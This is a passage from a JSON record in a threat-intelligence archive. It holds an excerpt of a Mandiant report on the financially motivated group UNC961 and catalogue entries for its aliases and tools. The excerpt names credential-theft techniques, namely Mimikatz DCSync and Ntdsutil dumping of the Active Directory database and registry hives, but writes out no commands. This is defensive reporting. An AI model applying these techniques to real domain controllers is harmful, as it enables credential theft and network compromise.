T1018, T1069.002, T1482, T1087.002]. Mandiant identified evidence of credential access activities\nleveraging Mimikatz DCSync [T1003.006] and the Windows Active Directory utility Ntdsutil to dump the Active Directory\ndatabase ntds.dit [T1003.003] and the SYSTEM and SECURITY registry hives on a domain controller.  \n   Page 13 of 21",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated"
	],
	"report_names": [
		"unc961-multiverse-financially-motivated"
	],
	"threat_actors": [
		{
			"id": "056826cb-6e17-4954-a9b4-2cc8c6ae3cb8",
			"created_at": "2023-03-04T02:01:54.115678Z",
			"updated_at": "2026-04-10T02:00:03.360898Z",
			"deleted_at": null,
			"main_name": "Prophet Spider",
			"aliases": [
				"GOLD MELODY",
				"UNC961"
			],
			"source_name": "MISPGALAXY:Prophet Spider",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "47b52642-e5b8-4502-b714-b625002d86aa",
			"created_at": "2024-06-19T02:03:08.086579Z",
			"updated_at": "2026-04-10T02:00:03.812509Z",
			"deleted_at": null,
			"main_name": "GOLD MELODY",
			"aliases": [
				"PROPHET SPIDER",
				"UNC961"
			],
			"source_name": "Secureworks:GOLD MELODY",
			"tools": [
				"7-Zip",
				"AUDITUNNEL",
				"BURP Suite",
				"GOTROJ",
				"JSP webshells",
				"Mimikatz",
				"Wget"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434318,
	"ts_updated_at": 1775826707,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4ccfa7f390952235e6b2597e67fd40f4fcf36c72.pdf",
		"text": "https://archive.orkl.eu/4ccfa7f390952235e6b2597e67fd40f4fcf36c72.txt",
		"img": "https://archive.orkl.eu/4ccfa7f390952235e6b2597e67fd40f4fcf36c72.jpg"
	}
}